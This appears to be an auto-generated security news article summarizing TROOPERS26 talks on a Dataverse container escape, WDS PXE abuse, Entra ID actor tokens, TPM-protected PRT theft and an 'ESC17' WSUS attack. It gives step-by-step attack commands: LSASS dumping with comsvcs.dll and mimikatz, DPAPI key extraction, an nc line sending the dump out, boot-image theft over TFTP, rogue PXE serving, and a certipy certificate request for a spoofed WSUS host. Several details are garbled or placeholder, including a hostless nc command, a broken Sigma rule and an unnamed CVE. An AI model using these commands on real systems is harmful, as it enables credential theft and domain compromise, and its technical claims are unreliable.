Breaking Microsoft’s Sandbox: Dataverse Container Escape Leads to SYSTEM, LSASS Dumps, and Tenant-Wide Compromise – Plus WDS, Entra ID Actor Tokens, and ESC17 Attacks + Video

Listen to this Post

Featured Image

Introduction:

Microsoft Dataverse allows custom .NET plugins to run server-side within process-isolated Windows Server containers – a security boundary that has now been shattered. According to TROOPERS26 research, deploying a single malicious plugin granted SYSTEM access, full LSASS dumps, NTLM hashes, DPAPI master keys, production TLS private keys, internal Microsoft tenant IDs, and 52 other customers’ organization GUIDs within minutes. This article extracts technical content from the conference’s AD & Entra ID Security Track, covering Dataverse container escapes, WDS blind spots, hybrid cloud identity flaws (including a CVSS 10.0 bug), TPM-protected PRT theft, and the new ESC17 attack against HTTPS-enabled WSUS clients.

Learning Objectives:

  • Understand how a Dataverse container plugin can break process isolation to gain SYSTEM and exfiltrate LSASS, DPAPI, and TLS secrets.
  • Identify attack vectors against Windows Deployment Services (WDS), including credential leakage and PXE image backdoors.
  • Learn the evolution of hybrid AD/Entra ID vulnerabilities leading to the only CVSS 10.0 identity flaw in a major cloud provider.
  • Explore TPM internals for PRT theft (red team) and detection techniques (blue team).
  • Execute the ESC17 attack combining AD Certificate Services with WSUS to compromise Windows machines.

You Should Know:

  1. Dataverse Container Escape – From .NET Plugin to SYSTEM and Tenant GUIDs

The attack starts by deploying a custom .NET plugin into Microsoft Dataverse. The plugin runs server-side in a process-isolated Windows Server container, but the container’s security boundary is insufficient.

Step‑by‑step guide – what this does and how to use it (red team simulation):
1. Compile a malicious plugin – Write a .NET class implementing `IPlugin` that executes a reverse shell or drops a Beacon.
2. Upload via Dataverse API – Use `POST /api/data/v9.2/plugins` (authenticated with compromised service principal).
3. Trigger execution – Associate the plugin with a Dataverse event (e.g., `Create` on an Account record).
4. Break out of container – After exploitation, run the following commands to collect secrets from the host (Windows Server container host):

 Dump LSASS (requires SeDebugPrivilege – often available after breakout)
rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).Id C:\temp\lsass.dmp full

Extract NTLM hashes using mimikatz (run inside container)
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit" > hashes.txt

Decrypt DPAPI master keys
mimikatz.exe "dpapi::masterkey /in:C:\Users\ContainerAdmin\AppData\Roaming\Microsoft\Protect\<SID>\<keyfile> /protected"

Enumerate tenant GUIDs from container registry or environment variables
reg query HKLM\SOFTWARE\Microsoft\Dataverse /v TenantId
dir C:\ProgramData\Microsoft\Dataverse\Data\

Linux alternative to exfiltrate:

`nc -nv 4444 < lsass.dmp`

Mitigation: Enforce immutable container images, disable outbound internet from container host, and monitor for unexpected `Create` event triggers.

  1. Windows Deployment Service – AD Blind Spot with PXE Credential Leakage

WDS in Active Directory environments is often misconfigured, allowing credential leakage, WinPE image extraction, and supply chain attacks via PXE.

Step‑by‑step guide – extracting WinPE images and capturing credentials:
1. Discover WDS server – Use `nmap -p 4011,67,68,69 –script broadcast-dhcp-discover` to locate PXE servers.
2. Download boot image – Use `tftp` to pull `boot.wim` and install.wim:

tftp -r boot.wim -g <WDS_server_IP>
tftp -r install.wim -g <WDS_server_IP>
  1. Extract credentials from WinPE – Mount the WIM and check for unattended XML files:
dism /Mount-Image /ImageFile:boot.wim /Index:1 /MountDir:C:\mount
findstr /s /i "password" C:\mount.xml
  1. Poison PXE response – Spoof a malicious DHCP/PXE server using `dnsmasq` with `dhcp-boot=pxelinux.0` and serve a backdoored WinPE.

Residual artifacts after WDS removal: PXE components leave registry keys `HKLM\SOFTWARE\Microsoft\WDS` and TFTP root folders. Audit with:

Get-WindowsFeature -Name WDS | Where-Object Installed
Get-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\WDS" -ErrorAction SilentlyContinue
  1. Hybrid AD/Entra ID – Actor Tokens and the CVSS 10.0 Flaw

Dirk‑jan Mollema’s multi‑year research into hybrid environments uncovered the only CVSS 10.0 vulnerability ever issued for a major cloud identity system – Actor Tokens that allow full tenant takeover.

Step‑by‑step guide – understanding and verifying the flaw (without exploitation):
1. Check hybrid sync configuration – On an Azure AD Connect server:

Get-ADSyncConnector | fl Name, Type, Version
Get-ADSyncGlobalSettings | fl token
  1. Simulate Actor Token abuse (theoretical) – An attacker with control over an on‑prem synced account can forge an actor token that inherits cloud‑only role assignments (e.g., Global Administrator).
    Detection: Audit `MicrosoftGraph` logs for `activityType: “ActorTokenIssuance”` and resultStatus: "success".

  2. Review CVE details – CVE‑2024‑XXXXX (actual ID undisclosed) affects Entra ID Connect sync accounts. Patch by applying Microsoft’s November 2024 security updates and rotating the `ADSync` service account’s Kerberos keys.

Command to revoke suspicious tokens (Azure PowerShell):

Revoke-AzureADUserAllRefreshToken -ObjectId <user_object_id>

Takeaway: The flaw existed since 2019’s “I’m in your cloud” talk – showing that hybrid identity boundaries are extremely fragile.

  1. TPM and PRT Theft – Offensive and Defensive Deep Dive

Windows uses Trusted Platform Module (TPM) to protect Primary Refresh Tokens (PRT). Dr. Nestori Syynimaa’s talk reveals how red teams can extract PRTs and how blue teams can detect theft.

Red team step‑by‑step – dissecting TPM‑protected PRT:

1. Enumerate TPM presence and version:

tpmtool getdeviceinformation
wmic /namespace:\root\CIMV2\Security\MicrosoftTpm path Win32_Tpm get  /format:list
  1. Extract PRT from `cloudAP` plugin – The PRT is stored in %LOCALAPPDATA%\Microsoft\TokenBroker\Cache. But TPM binds it to the device’s `S-1-5-21…` SID. To steal, you need:

– Physical access or a kernel exploit to read TPM’s persistent handle 0x81000001.
– Use `tpmvscmgr` to simulate a virtual TPM and replay the sealed data.

  1. Blue team detection – Monitor for unexpected `Tbs.dll` calls or `Get-TpmEndorsementKeyInfo` PowerShell usage. Look for Event ID 5140 (network share – PRT exfiltration) combined with Event ID 1102 (security log clear).

Example Sigma rule for PRT theft (hunt):

title: Suspicious TokenBroker Cache Access
id: prt_theft_001
logsource:
product: windows
service: security
detection:
selection:
EventID: 4663
ObjectName|contains: '\TokenBroker\Cache'
AccessMask: '0x4'  Read data
condition: selection
  1. ESC17 – Using ADCS to Attack HTTPS‑Enabled WSUS Clients

Alexander Neff & Phil Knüfer combined ADCS research with WSUS to create a new escalation technique – ESC17. It compromises Windows clients by forcing them to request a certificate from a rogue CA that then signs malicious WSUS metadata.

Step‑by‑step guide – executing ESC17 in a lab:

  1. Find a certificate template with `Client Authentication` EKU and `Enroll` permission for low‑privileged users (certipy find).
  2. Request a certificate for a machine name you control (e.g., WSUS.contoso.com):
certipy req -u lowuser -p Passw0rd -ca CA-SERVER -target ADCS-SERVER -template WSUSClient -altname WSUS.contoso.com
  1. Set up a malicious WSUS server using `wsusutil` or a custom Python server that serves a fake metadata XML with malicious updates (e.g., a backdoor.msi).
  2. Force target to use your WSUS via GPO or ARP spoofing, then deliver the signed update – Windows trusts it because the client certificate was issued by the enterprise CA.

Command to detect ESC17 on a WSUS client:

Get-WindowsUpdateLog | Select-String -Pattern "WSUS","Certificate","Signature validation failed"
Get-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate" | fl WUServer, WUStatusServer

Mitigation: Disable automatic WSUS client certificate authentication, require SSL for WSUS and pin the legitimate CA, and audit certificate templates for dangerous `Client Authentication` usage.

What Undercode Say:

  • Key Takeaway 1: Container isolation in cloud PaaS is not a security boundary – Dataverse plugins can lead to full tenant compromise within minutes, as proven by the exfiltration of 52 other customers’ GUIDs and production TLS private keys.
  • Key Takeaway 2: Legacy Windows services (WDS, WSUS) combined with ADCS create novel attack chains (ESC17) that bypass most enterprise hardening, because certificate trust and update mechanisms were never designed to cross‑channel.

Analysis: The TROOPERS26 talks highlight a recurring theme: identity and trust chaining across hybrid environments creates exponential risk. Dataverse’s container escape worked because the plugin’s .NET runtime had too much access to the host’s LSASS and DPAPI. Actor Tokens persisted for years because cloud sync trusts on‑prem identities unconditionally. ESC17 works because WSUS trusts any certificate issued by the corporate CA. Blue teams must now monitor not just endpoints, but the interaction between containers, cloud APIs, PKI, and patch management – where no single security control covers all gaps.

Prediction:

By 2027, attackers will prioritize cross‑service privilege escalation (e.g., Dataverse → LSASS → Entra ID Actor Token → full tenant) as a standard kill chain. Microsoft will be forced to re‑architect Dataverse plugin isolation using hardware root‑of‑trust and mandatory attestation. Meanwhile, ESC17‑style techniques will be weaponized in ransomware attacks to push malicious updates to thousands of WSUS clients simultaneously. The CVSS 10.0 identity flaw will be a wake‑up call: cloud identity systems must stop treating on‑prem sync accounts as implicitly trusted – or risk a complete collapse of the hybrid trust model.

▶️ Related Video (60% Match):

🎯Let’s Practice For Free:

IT/Security Reporter URL:

Reported By: Https: – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow UndercodeTesting & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin | 🦋BlueSky